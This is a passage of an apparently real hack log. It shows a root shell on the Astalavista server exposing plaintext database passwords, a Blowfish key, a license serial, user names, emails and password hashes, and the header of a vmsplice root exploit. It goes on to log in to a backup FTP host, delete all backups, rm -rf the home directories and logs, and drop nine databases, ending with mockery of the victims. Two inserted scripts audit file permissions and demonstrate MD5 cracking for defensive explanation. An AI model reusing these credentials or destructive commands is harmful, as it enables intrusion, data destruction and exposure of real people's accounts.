drwx------  2 root    root    16384 Sep 11  2007 lost+found
drwxr-xr-x  2 root    root     4096 Sep 14  2007 my
drwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata
drwx------  2 jon     jon      4096 Sep 15  2007 test
drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp

sh-3.2# cd admin
sh-3.2# ls -la
total 1735896
drwx--x--x  9 admin admin       4096 Nov 28  2007 .
drwxr-xr-x 14 root  root        4096 Mar 11 17:56 ..
drwxrwxr-x  2 admin admin       4096 Oct 25  2007 admin_backups
drwx------  2 admin admin       4096 Sep 28  2007 backups
-rw-------  1 admin admin        860 Sep 17  2008 .bash_history
-rw-r--r--  1 admin admin         24 Sep 14  2007 .bash_logout
-rw-r--r--  1 admin admin        176 Sep 14  2007 .bash_profile
-rw-r--r--  1 admin admin        124 Sep 14  2007 .bashrc
drwxr-xr-x  2 root  root        4096 Sep 28  2007 com_backups
drwx--x--x  6 admin admin       4096 Sep 21  2007 domains
drwxrwx---  3 admin mail        4096 Sep 21  2007 imap
-rw-r--r--  1 root  root          24 Sep 21  2007 info.php
drwx------  2 admin admin       4096 Sep 21  2007 mail
-rw-r--r--  1 root  root         716 Nov 28  2007 server.csr
-rw-r--r--  1 root  root         887 Nov 28  2007 server.key
-rw-r-----  1 admin mail          34 Sep 14  2007 .shadow
-rw-r-----  1 admin com   1775711054 Oct 25  2007 user.admin.com.tar.gz
drwx--x--x  2 admin admin       4096 Jul 29  2008 user_backups

sh-3.2# ..
sh-3.2# cd jon
sh-3.2# ls -la
total 36
drwx------  3 jon  jon  4096 Sep 21  2007 .
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
-rw-------  1 jon  jon    53 Sep 21  2007 .bash_history
-rw-r--r--  1 jon  jon    24 Sep 21  2007 .bash_logout
-rw-r--r--  1 jon  jon   176 Sep 21  2007 .bash_profile
-rw-r--r--  1 jon  jon   124 Sep 21  2007 .bashrc
-rw-r--r--  1 root root   24 Sep 21  2007 info.php
drwxrwxr-x  2 jon  jon  4096 Sep 21  2007 public_html

sh-3.2# cd ..
sh-3.2# cd test
sh-3.2# ls -la
total 48
drwx------  2 jon  jon  4096 Sep 15  2007 .
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
-rw-------  1 jon  jon    79 Sep 21  2007 .bash_history
-rw-r--r--  1 jon  jon    24 Sep 15  2007 .bash_logout
-rw-r--r--  1 jon  jon   176 Sep 15  2007 .bash_profile
-rw-r--r--  1 jon  jon   124 Sep 15  2007 .bashrc

sh-3.2# cat .bash_history
/usr/bin/mysqladmin -u root password PoliuJhytg67

sh-3.2# cd ..
sh-3.2# cd astanet
sh-3.2# ls -la
total 52
drwx--x--x  6 astanet astanet 4096 Jun  4 09:51 .
drwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..
drwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth
-rw-------  1 astanet astanet 3892 Apr 16 12:14 .bash_history
-rw-r--r--  1 astanet astanet   33 Dec 17 21:50 .bash_logout
-rw-r--r--  1 astanet astanet  176 Dec 17 21:50 .bash_profile
-rw-r--r--  1 astanet astanet  124 Dec 17 21:50 .bashrc
drwx--x--x  3 astanet astanet 4096 Dec 23 12:18 domains
drwxrwx---  3 astanet mail    4096 Dec 23 12:18 imap
drwx------  2 astanet astanet 4096 Dec 23 12:18 mail
-rw-------  1 astanet astanet  197 Jun  4 09:51 .mysql_history
lrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
-rw-r-----  1 astanet mail      34 Dec 22 12:41 .shadow

sh-3.2# cd auth/
sh-3.2# ls -la
total 28
drwxr-xr-x 2 root    root    4096 Dec 23 16:00 .
drwx--x--x 6 astanet astanet 4096 Jun  4 09:51 ..
-rw-r--r-- 1 root    root     321 Jan  5  2006 hackercontest.config.inc.php
-rw-r--r-- 1 root    root     319 Jan  5  2006 hosting.config.inc.php
-rw-r--r-- 1 root    root      24 Jun  4 09:38 .htadm_pwd
-rw-r--r-- 1 root    root      49 Jan  5  2006 .htpasswd_newhosting
-rw-r--r-- 1 root    root      51 Oct 11  2006 .htwebalizer_pwd

sh-3.2# cat hackercontest.config.inc.php
<?PHP
// Variables for the database connection //
$conxHost     = 'localhost';     // MySQL hostname
$conxUser     = 'hackercontest'; // MySQL user
$conxPassword = 'K6m@7dUc';      // MySQL password
$bfkey        = 'cXvB3981';      // Encryption/Decryption Key for Blowfish
?>

sh-3.2# cat hosting.config.inc.php
<?PHP
// Variables for the database connection //
$conxHost     = 'localhost';   // MySQL hostname
$conxUser     = 'hostinguser'; // MySQL user
$conxPassword = 'cXvB3981';    // MySQL password
$bfkey        = 'cXvB3981';    // Encryption/Decryption Key for Blowfish
?>

sh-3.2# cd ..
sh-3.2# cd com
sh-3.2# ls -la
total 141208
drwx--x--x 10 com  com       4096 Apr 28 12:40 .
drwxr-xr-x 14 root root      4096 Mar 11 17:56 ..
drwx------  2 com  com       4096 Jun  4 04:04 backups
-rw-r--r--  1 root root   2419504 Sep 28  2007 backup.sql
drwxr-xr-x  2 com  com       4096 May 12 15:20 backup_system
-rw-------  1 com  com      21880 Jun  2 08:07 .bash_history
-rw-r--r--  1 com  com         24 Sep 24  2007 .bash_logout
-rw-r--r--  1 com  com        176 Sep 24  2007 .bash_profile
-rw-r--r--  1 com  com        124 Sep 24  2007 .bashrc
drwx--x--x  3 com  com       4096 Jan 29  2008 domains
-rw-r--r--  1 com  com      16409 Jul 16  2008 FWUser.class.php.fixed
drwxrwx---  3 com  mail      4096 Jan  6 19:24 imap
-rw-------  1 com  com         69 Nov 18  2008 .lesshst
drwx------  2 com  com       4096 Sep 24  2007 mail
-rw-------  1 com  com      13970 Mar 28 21:42 .mysql_history
drwxr-xr-x  2 com  com       4096 Aug 20  2008 .ncftp
lrwxrwxrwx  1 com  com         37 Sep 24  2007 public_html -> ./domains/astalavista.com/public_html
-rw-r-----  1 com  mail        34 Sep 24  2007 .shadow
drwx------  2 com  com       4096 Aug 26  2008 .ssh
-rwx------  1 com  com       8515 Feb 10  2008 t
-rw-rw-r--  1 com  com       6265 Feb 11  2008 t.c
drwxrwxr-x  2 com  com       4096 Jan 30 15:47 tmp
-rw-rw-r--  1 com  com        617 May 20  2008 .toprc
-rw-rw-r--  1 com  com  141851766 May 19  2008 version2-backup-20080519-0900.sql
-rw-------  1 com  com      16629 Mar 28 21:46 .viminfo
-rw-rw-r--  1 com  com         51 Aug 25  2008 .vimrc
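Most of what the root session turned up so far is permissions rather than code: the config files holding database passwords are mode 0644 in a directory the `apache` group can traverse, `backup.sh` carries FTP and MySQL credentials, and root's history shows `chmod 4777` on `ping` and `traceroute`, which leaves setuid binaries that any local user can overwrite. The audit below is an added example, not a tool from the page or from the server's operators: it walks a tree and reports files readable by others (or, optionally, by the web server's group) that contain credential assignments, setuid/setgid files that are world-writable, and world-writable directories without the sticky bit. The fixture it builds in a temporary directory is constructed for the example; only the file names echo the dump, and every secret in it is made up.

```python
import os
import re
import stat
import tempfile

# Matches "password = 'x'", "FTP_PASS=\"x\"", "passwd=x", "$conxPassword = 'x'", ...
CRED_RE = re.compile(r"(pass(word|wd)?|secret)\W{0,4}=\s*['\"]?\S+", re.I)
MAX_SCAN = 1 << 20  # only grep regular files up to 1 MiB


def scan(root, web_gid=None):
    """Walk `root` and return sorted (finding, path) tuples.

    A file counts as exposed when it is world-readable, or when `web_gid` is given
    and the file is group-readable with that gid (the config dir in the dump is
    astanet:apache 0750, so group access is what the web server process gets)."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            mode = st.st_mode
            if stat.S_ISLNK(mode):
                continue  # the target is judged when the walk reaches it
            if stat.S_ISDIR(mode):
                if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
                    findings.append(("world-writable dir without sticky bit", path))
                continue
            if not stat.S_ISREG(mode):
                continue
            if mode & (stat.S_ISUID | stat.S_ISGID) and mode & stat.S_IWOTH:
                findings.append(("setuid/setgid and world-writable", path))
            exposed = bool(mode & stat.S_IROTH)
            if web_gid is not None and st.st_gid == web_gid and mode & stat.S_IRGRP:
                exposed = True
            if exposed and st.st_size <= MAX_SCAN:
                with open(path, "rb") as f:
                    text = f.read().decode("latin-1")
                if CRED_RE.search(text):
                    findings.append(("readable file contains credential", path))
    return sorted(findings)


def _write(path, text, mode):
    with open(path, "w") as f:
        f.write(text)
    os.chmod(path, mode)


def build_fixture(base):
    """Constructed tree: names mirror the dump, contents and secrets are made up."""
    os.makedirs(os.path.join(base, "config"))
    _write(os.path.join(base, "config", "com.conf.php"),
           "<?PHP\n$_CONFIG['db_mem_password'] = 'made-up';\n", 0o644)   # readable: flagged
    _write(os.path.join(base, ".my.cnf"), "[client]\nuser=x\npassword=made-up\n", 0o600)  # private: ok
    _write(os.path.join(base, "backup.sh"), '#!/bin/sh\nFTP_PASS="made-up"\n', 0o755)  # flagged
    _write(os.path.join(base, "ping"), "#!/bin/sh\n", 0o4777)  # root's `chmod 4777 ping`
    _write(os.path.join(base, "README"), "no secrets here\n", 0o644)  # no assignment: ok
    os.makedirs(os.path.join(base, "upload"))
    os.chmod(os.path.join(base, "upload"), 0o777)  # world-writable, no sticky bit


def audit_fixture():
    """Build the fixture in a temp dir, scan it, return findings with relative paths."""
    with tempfile.TemporaryDirectory() as base:
        build_fixture(base)
        return sorted((kind, os.path.relpath(path, base)) for kind, path in scan(base))


if __name__ == "__main__":
    for kind, rel in audit_fixture():
        print(f"{kind}: {rel}")
```

On a real box the call is `scan("/home", web_gid=grp.getgrnam("apache").gr_gid)`; the group-readable check is what catches the 0644 config files here, since the web server is the process an attacker is sitting in after a web exploit, and it reads them as easily as the owner does.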
sh-3.2# head t.c
/*
 * jessica_biel_naked_in_my_bed.c
 *
 * [Silesian dialect, roughly: I roll in from the pub and see that Wojta has nothing
 *  to do again, damn it. Kids, here is something for you to play with until this one
 *  gets blabbed too. Anyway it is old as hell and somewhat broken.]
 *
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *

sh-3.2# cd /
sh-3.2# ls -la
total 360
drwxr-xr-x  25 root root   4096 Jun  3 02:43 .
drwxr-xr-x  25 root root   4096 Jun  3 02:43 ..
-rw-------   1 root root  10240 Jun  3 02:39 aquota.group
-rw-------   1 root root  10240 Jun  3 02:39 aquota.user
-rw-r-----   1 root root    819 Jul 17  2008 astalavista.us.db
-rw-r--r--   1 root root      0 Jun  3 02:43 .autofsck
-rw-r--r--   1 root root      0 Sep 16  2007 .autorelabel
drwxr-xr-x   3 root root   4096 Dec 29  2007 backup
drwxr-xr-x   2 root root   4096 Jun  4 04:03 bin
drwxr-xr-x   5 root root   4096 Jun  2 14:06 boot
drwxr-xr-x  11 root root   3620 Jun  3 02:43 dev
drwxr-xr-x  84 root root  12288 Jun  4 03:16 etc
drwxr-xr-x  14 root root   4096 Mar 11 17:56 home
-rw-r--r--   1 root root  13387 Mar 20  2008 httpd.conf
drwxr-xr-x  11 root root   4096 Jun  4 04:02 lib
drwxr-xr-x   7 root root   4096 Jun  4 04:03 lib64
drwx------   2 root root  16384 Sep 11  2007 lost+found
drwxr-xr-x   2 root root   4096 Mar 11 17:56 media
drwxr-xr-x   2 root root      0 Jun  3 02:43 misc
drwxr-xr-x   2 root root   4096 Mar 11 17:56 mnt
-rw-r--r--   1 root root   5859 Feb  3  2008 mrtg.cfg
drwxr-xr-x   2 root root      0 Jun  3 02:43 net
drwxr-xr-x   3 root root   4096 Mar 11 17:56 opt
dr-xr-xr-x 264 root root      0 Jun  3 02:42 proc
drwxr-x---  15 root root   4096 Jun  4 08:40 root
drwxr-xr-x   2 root root  12288 Jun  4 04:03 sbin
drwxr-xr-x   2 root root   4096 Mar 11 17:56 selinux
drwxr-xr-x   2 root root   4096 Mar 11 17:56 srv
drwxr-xr-x  11 root root      0 Jun  3 02:42 sys
drwxrwxrwt   4 root root 122880 Jun  4 10:35 tmp
drwxr-xr-x  16 root root   4096 Jun  2 13:56 usr
drwxr-xr-x  26 root root   4096 Jun  4 03:16 var

sh-3.2# cd opt
sh-3.2# ls -la
total 20
drwxr-xr-x  3 root root 4096 Mar 11 17:56 .
drwxr-xr-x 25 root root 4096 Jun  3 02:43 ..
drwxr-xr-x 15 root root 4096 Mar 20  2008 lsws

sh-3.2# cd lsws/
sh-3.2# ls -la
total 108
drwxr-xr-x 15 root   root    4096 Mar 20  2008 .
drwxr-xr-x  3 root   root    4096 Mar 11 17:56 ..
drwxr-xr-x  8 root   root    4096 Mar 20  2008 add-ons
drwxr-xr-x 13 root   root    4096 May 29 15:10 admin
drwxr-xr-x  5 apache apache  4096 May 29 15:10 autoupdate
drwxr-xr-x  2 root   root    4096 May 29 15:10 bin
drwx------  4 apache apache  4096 Jun  3 02:43 conf
drwxr-xr-x  7 apache apache  4096 Mar 20  2008 DEFAULT
drwxr-xr-x  2 root   root    4096 Sep 15  2008 docs
drwxr-xr-x  2 root   root    4096 May 29 15:10 fcgi-bin
drwxr-xr-x  2 root   root    4096 Sep 15  2008 lib
-rw-r--r--  1 root   root    6959 May 29 15:10 LICENSE
-rw-r--r--  1 root   root    2214 May 29 15:10 LICENSE.OpenLDAP
-rw-r--r--  1 root   root    6279 May 29 15:10 LICENSE.OpenSSL
-rw-r--r--  1 root   root    3208 May 29 15:10 LICENSE.PHP
drwxr-xr-x  2 root   root   20480 Jun  4 09:55 logs
drwxr-xr-x  2 root   root    4096 Mar 20  2008 php
drwx------  2 apache apache  4096 Mar 20  2008 phpbuild
drwxr-xr-x  3 root   root    4096 Mar 20  2008 share
-rw-r--r--  1 root   root       6 May 29 15:10 VERSION

sh-3.2# cd conf
sh-3.2# ls -la
total 48
drwx------  4 apache apache 4096 Jun  3 02:43 .
drwxr-xr-x 15 root   root   4096 Mar 20  2008 ..
drwx------  2 apache apache 4096 Mar 20  2008 cert
-rw-r--r--  1 apache apache 6668 May 29 15:13 httpd_config.xml
-rw-------  1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
-rw-r--r--  1 root   apache    0 Jun  3 14:11 .last
-rw-------  1 apache apache  256 May 29 15:10 license.key
-rw-------  1 apache apache  256 Mar 21  2008 license.key.old
-rw-------  1 apache apache 3320 Mar 20  2008 mime.properties
-rw-------  1 apache apache   20 May 29 15:10 serial.no
drwx------  2 apache apache 4096 Mar 20  2008 templates

sh-3.2# cat serial.no
IbDl-oVsO-CKqL-wVRa

sh-3.2# mysql
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 286844
Server version: 5.0.45-community-log MySQL Community Edition (GPL)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+-----------------------+
| Database              |
+-----------------------+
| information_schema    |
| astanet_ads           |
| astanet_mailing_lists |
| astanet_mediawiki     |
| astanet_membersystem  |
| com_contrexx          |
| com_contrexx2         |
| com_contrexx2_live    |
| da_roundcube          |
| dolphin               |
| ideapool              |
| mysql                 |
| test                  |
| yourmaster            |
+-----------------------+
14 rows in set (0.00 sec)
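The `eventum_user` table dumped next stores `usr_password` as a `varchar(32)` of 32 hex characters, which is the shape of an unsalted MD5 (this example assumes that is what it is). One of the dumped values, `e10adc3949ba59abbe56e057f20f883e`, is the MD5 of `123456`. The block below is an added example, not code from the page: it shows why an unsalted fast hash is barely better than the plaintext column in the other database, by counting the hash computations a wordlist attack needs against unsalted rows versus rows salted per user (`md5(salt || password)`, a layout assumed for the comparison). The wordlist and the salted records are constructed for the example.

```python
import hashlib

# Constructed wordlist. "123456" is the entry that matters: its MD5 is
# e10adc3949ba59abbe56e057f20f883e, which appears in the dump.
WORDLIST = ["password", "letmein", "123456", "qwerty", "astalavista", "admin"]

# The one dumped value the example needs, plus a made-up hash that must not crack.
DUMPED = ["e10adc3949ba59abbe56e057f20f883e", "00000000000000000000000000000000"]


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def crack_unsalted(hashes, wordlist):
    """Unsalted: one MD5 per candidate answers for every row at once, because
    equal passwords give equal hashes. Returns ({hash: password}, md5 calls)."""
    table = {md5_hex(w.encode()): w for w in wordlist}
    matches = {h: table[h] for h in hashes if h in table}
    return matches, len(wordlist)


def crack_salted(records, wordlist):
    """Salted as md5(salt || password): the lookup table cannot be shared, so the
    wordlist is rerun for every row. `records` maps hash -> salt, which is what a
    dump of such a table gives the attacker. Returns ({hash: password}, md5 calls)."""
    matches, calls = {}, 0
    for h, salt in records.items():
        for w in wordlist:
            calls += 1
            if md5_hex(salt + w.encode()) == h:
                matches[h] = w
                break
    return matches, calls


def salted_records(pairs):
    """Build {hash: salt} from constructed (salt, password) pairs."""
    return {md5_hex(salt + pw.encode()): salt for salt, pw in pairs}


if __name__ == "__main__":
    print(crack_unsalted(DUMPED, WORDLIST))
    recs = salted_records([(b"s1", "qwerty"), (b"s2", "admin"), (b"s3", "nope")])
    print(crack_salted(recs, WORDLIST))
```

Salting only removes the shared-table shortcut; MD5 itself still runs at hundreds of millions of guesses per second on commodity hardware, so the per-row rerun is cheap. The actual fix is a deliberately slow, salted KDF, which is a different property from the one counted here.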
mysql> use ideapool
Database changed
mysql> show tables;
+-----------------------------------+
| Tables_in_ideapool                |
+-----------------------------------+
| eventum_columns_to_display        |
| eventum_custom_field              |
| eventum_custom_field_option       |
| eventum_custom_filter             |
| eventum_customer_account_manager  |
| eventum_customer_note             |
| eventum_email_account             |
| eventum_email_draft               |
| eventum_email_draft_recipient     |
| eventum_email_response            |
| eventum_faq                       |
| eventum_faq_support_level         |
| eventum_group                     |
| eventum_history_type              |
| eventum_irc_notice                |
| eventum_issue                     |
| eventum_issue_association         |
| eventum_issue_attachment          |
| eventum_issue_attachment_file     |
| eventum_issue_checkin             |
| eventum_issue_custom_field        |
| eventum_issue_history             |
| eventum_issue_quarantine          |
| eventum_issue_requirement         |
| eventum_issue_user                |
| eventum_issue_user_replier        |
| eventum_link_filter               |
| eventum_mail_queue                |
| eventum_mail_queue_log            |
| eventum_news                      |
| eventum_note                      |
| eventum_phone_support             |
| eventum_project                   |
| eventum_project_category          |
| eventum_project_custom_field      |
| eventum_project_email_response    |
| eventum_project_field_display     |
| eventum_project_group             |
| eventum_project_link_filter       |
| eventum_project_news              |
| eventum_project_phone_category    |
| eventum_project_priority          |
| eventum_project_release           |
| eventum_project_round_robin       |
| eventum_project_status            |
| eventum_project_status_date       |
| eventum_project_user              |
| eventum_reminder_action           |
| eventum_reminder_action_list      |
| eventum_reminder_action_type      |
| eventum_reminder_field            |
| eventum_reminder_history          |
| eventum_reminder_level            |
| eventum_reminder_level_condition  |
| eventum_reminder_operator         |
| eventum_reminder_priority         |
| eventum_reminder_requirement      |
| eventum_reminder_triggered_action |
| eventum_resolution                |
| eventum_round_robin_user          |
| eventum_search_profile            |
| eventum_status                    |
| eventum_subscription              |
| eventum_subscription_type         |
| eventum_support_email             |
| eventum_support_email_body        |
| eventum_time_tracking             |
| eventum_time_tracking_category    |
| eventum_user                      |
+-----------------------------------+
69 rows in set (0.00 sec)

mysql> describe eventum_user;
+-------------------------+------------------+------+-----+---------------------+----------------+
| Field                   | Type             | Null | Key | Default             | Extra          |
+-------------------------+------------------+------+-----+---------------------+----------------+
| usr_id                  | int(11) unsigned | NO   | PRI | NULL                | auto_increment |
| usr_grp_id              | int(11) unsigned | YES  | MUL | NULL                |                |
| usr_customer_id         | int(11) unsigned | YES  |     | NULL                |                |
| usr_customer_contact_id | int(11) unsigned | YES  |     | NULL                |                |
| usr_created_date        | datetime         | NO   |     | 0000-00-00 00:00:00 |                |
| usr_status              | varchar(8)       | NO   |     | active              |                |
| usr_password            | varchar(32)      | NO   |     |                     |                |
| usr_full_name           | varchar(255)     | NO   |     |                     |                |
| usr_email               | varchar(255)     | NO   | UNI |                     |                |
| usr_preferences         | longtext         | YES  |     | NULL                |                |
| usr_sms_email           | varchar(255)     | YES  |     | NULL                |                |
| usr_clocked_in          | tinyint(1)       | YES  |     | 0                   |                |
| usr_lang                | varchar(5)       | YES  |     | NULL                |                |
+-------------------------+------------------+------+-----+---------------------+----------------+
13 rows in set (0.00 sec)

mysql> select usr_full_name,usr_email,usr_password from eventum_user;
+----------------------+-------------------------------+----------------------------------+
| usr_full_name        | usr_email                     | usr_password                     |
+----------------------+-------------------------------+----------------------------------+
| system               | system-account@example.com    | 14589714398751513457adf349173434 |
| Developer (Paulo)    | paulo.santos@astalavista.ch   | 26a35a1cf8895c27fb37ef4cf149f7bb |
| Be1er0ph0r           | be1er0ph0r@gmx.de             | 229766dc0ca1fb67160a8782321dfdce |
| Admin                | pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
| ADMIN                | admin@astalavista.ch          | f6fdffe48c908deb0f4c3bd36c032e72 |
| USER                 | user@astalavista.ch           | 5cc32e366c87c4cb49e4309b75f57d64 |
| Glafkos - (nowayout) | glafkos@astalavista.com       | f7735ab119023a8abb2301e67f81cd67 |
| Joao                 | joao.pontes@astalavista.net   | f805c071d7c823b937448c54c047b9fd |
| Pascal               | pm@astalavista.ch             | e10adc3949ba59abbe56e057f20f883e |
| commander            | commander@astalavista.com     | 932cd250918f881d41feb0b93883a926 |
| ishtus               | ishtus@astalavista.com        | a587ffc88b3dbbba3fd2fe67af649ff0 |
| sykadul              | sykadul@astalavista.com       | 20224a2f3eeb57a13a10b4df543c128e |
| Zach McElroy         | admin@badfoo.net              | 33c5d4954da881814420f3ba39772644 |
| usb                  | usbenigma@hushmail.com        | b513f22c3db6932855ad732f5f8a10a2 |
| cyph3r               | cyph3r@astalavista.com        | 6e1e50017a945e874d52ec91f9ab2cee |
+----------------------+-------------------------------+----------------------------------+
15 rows in set (0.00 sec)

mysql> select iss_description from eventum_issue where iss_id = 43;
+---------------------------------------------------------------------------+
| iss_description                                                           |
+---------------------------------------------------------------------------+
| Ok guys, to boost our traffic and revenue what we have to do is keep users
logged in... how to do that? well think about it... if a user is watching a movie... he'll be connected for 90
mins... 120mins... so what i propose is something like: http://www.surfthechannel.com/ since they only
provide LINKS to the movies they are LEGAL and don't break DMCA rules... so we could do the same...
"iframe" the content on our website or use a system like podcast that uses our own flash player to
stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only
viewed... which doesn't break any laws as far as i am aware (we should research on that just to be sure
though!) Of course we would have to provide users with the button to take the content off if they think
it breaks copyright laws and we will remove it... i think that makes it on the border of DMCA... We could
also put advertisement during play on the flash video player itself... extra $$... By sykadul | +----------------
------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------+ 1 row in set (0.00 sec) // Money and extra $$ is all they care
about. remember that. mysql> select iss_summary,iss_description from eventum_issue where iss_id
=42; +------------------------+---------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------------+ |
iss_summary | iss_description | +------------------------+--------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------
-----------------------------+ | Forum for REAL EXPERTS | Hello, Ishtus and I, Came up with a crazy and very
workable and professional idea. We create an invitation only forum with the BEST security experts
worldwide ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc.. One
example a friend of mine from coresecurity.com! We could have big projects etc.. and we can work all
together to bring to the security community exploits, open source software etc.. | +------------------------+--
------------------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------+ 1 row in set (0.00 sec) // What
an awesome yet original idea Ishtus and him... bring MORE security "experts", thats exactly what the
world needs... mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16; +-------
-----------+---------------------------------------------------------------------------------------------+ | iss_summary |
iss_description | +------------------+---------------------------------------------------------------------------------------------+
| Website guidance | Virtual Girl which guides you trought the website. We need a girl with who you can
( talk )!!! Also for the News! So my suggestion is a girl who read you the news loud if you like! you can
choose between read yourselfe or she read it for you or both! Go to www.heise.de! There is an example
for Voice News! It's a good thing!!! Have a look on the example girls!!
http://www.yaoti.com/de/free_yaoti.html or that http://www.yellostrom.de/ | +------------------+-----------
----------------------------------------------------------------------------------+ 1 row in set (0.00 sec) // ha ha. mysql>
select iss_summary,iss_description from eventum_issue where iss_id = 7; +--------------------------+-----------
------------------------------------------------------------------------------------------------+ | iss_summary |
iss_description | +--------------------------+--------------------------------------------------------------------------------------
---------------------+ | Exploit Development Team | We need an exploit development team to focus on
exploit research and publication under Astalavista name. | +--------------------------+-------------------------------
----------------------------------------------------------------------------+ 1 row in set (0.00 sec) // LOL. mysql> exit Bye
sh-3.2# ftp 212.254.194.163 Connected to 212.254.194.163. 220 BackupCOM_VW FTP server ready. 504
AUTH: security mechanism 'GSSAPI' not supported. 504 AUTH: security mechanism 'KERBEROS_V4' not
supported. KERBEROS_V4 rejected as an authentication type Name (212.254.194.163:root):
astalavista.com 331 Password required for astalavista.com. Password: 230 User astalavista.com logged
in. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 227 Entering Passive
Mode (212,254,194,163,2,188) 150 Opening BINARY mode data connection for 'file list'. dr-x------ 1 root
users 4096 Jun 4 06:13 astalavista.com 226 Transfer complete. ftp> cd astalavista.com 250 CWD
command successful. ftp> ls -la 227 Entering Passive Mode (212,254,194,163,2,189) 150 Opening
BINARY mode data connection for 'file list'. -rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29
22:10 09-04-28-astacom_full.tar -rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-
28-astacom_full.tar.bz2 -rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-
astacom_sql_full.sql.tar.bz2 -rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-
astacom-Public_HTML.tar -rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-
astacom-SQL_Dump.tar [snip] 226 Transfer complete. ftp> mdelete * ftp> ls -la 227 Entering Passive
Mode (212,254,194,163,2,193) 150 Opening BINARY mode data connection for 'file list'. 226 Transfer
complete. ftp> sh-3.2# cd /home sh-3.2# ls -la total 120 drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .. drwx--x--x 9 admin admin 4096 Nov 28 2007 admin -rw-------
1 root root 8192 Jun 4 03:03 aquota.group -rw------- 1 root root 8192 Jun 3 02:45 aquota.user drwx--x--x
6 astanet astanet 4096 Jun 4 09:51 astanet drwxr-xr-x 2 root root 4096 Jul 29 2008 backup drwxr-xr-x 2
root root 4096 Sep 17 2008 backup.14161 drwx--x--x 10 com com 4096 Apr 28 12:40 com drwxr-xr-x 2
root root 4096 May 17 2007 ftp drwx------ 3 jon jon 4096 Sep 21 2007 jon drwx------ 2 root root 16384
Sep 11 2007 lost+found drwxr-xr-x 2 root root 4096 Sep 14 2007 my drwxr-xr-x 5 mysql mysql 4096 Sep
24 2007 mysqldata drwx------ 2 jon jon 4096 Sep 15 2007 test drwxrwxrwt 2 root root 4096 Jul 29 2008
tmp sh-3.2# rm -rf backup/ sh-3.2# rm -rf backup.14161/ sh-3.2# rm -rf ftp/ sh-3.2# rm -rf jon/ sh-3.2#
rm -rf my/ sh-3.2# rm -rf mysqldata/ sh-3.2# rm -rf test/ sh-3.2# rm -rf tmp/ sh-3.2# cd ~ sh-3.2# rm -rf *
sh-3.2# rm -rf /var/log/ rm: cannot remove directory `/var/log//proftpd': Directory not empty sh-3.2#
rm -rf /home/* sh-3.2# mysql Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL
connection id is 407156 Server version: 5.0.45-community-log MySQL Community Edition (GPL) Type
'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> show databases; +-----------------------+ |
Database | +-----------------------+ | information_schema | | astanet_ads | | astanet_mailing_lists | |
astanet_mediawiki | | astanet_membersystem | | com_contrexx | | com_contrexx2 | |
com_contrexx2_live | | da_roundcube | | dolphin | | ideapool | | mysql | | test | | yourmaster | +------
-----------------+ 14 rows in set (0.03 sec) mysql> drop database astanet_membersystem; droQuery OK, 46
rows affected (0.81 sec) mysql> drop database com_contrexx; Query OK, 211 rows affected (2.72 sec)
mysql> drop database com_contrexx2; Query OK, 237 rows affected (2.23 sec) mysql> drop database
com_contrexx2_live; Query OK, 227 rows affected (7.63 sec) mysql> drop database ideapool; Query OK,
69 rows affected (0.19 sec) mysql> drop database yourmaster; Query OK, 158 rows affected (0.55 sec)
mysql> drop database astanet_ads; Query OK, 9 rows affected (0.11 sec) mysql> drop database
astanet_mailing_lists; Query OK, 24 rows affected (1.47 sec) mysql> drop database astanet_mediawiki;
Query OK, 31 rows affected (0.51 sec) mysql> show databases; +--------------------+ | Database | +-----------
---------+ | information_schema | | da_roundcube | | dolphin | | mysql | | test | +--------------------+ 5
rows in set (0.00 sec) What a journey! We're not sure exactly why the "Terminator" had any influence
on their naming (conventions) but we're sure Arnold himself wouldn't be in the wrong to say this pack of
morons *wont be back*.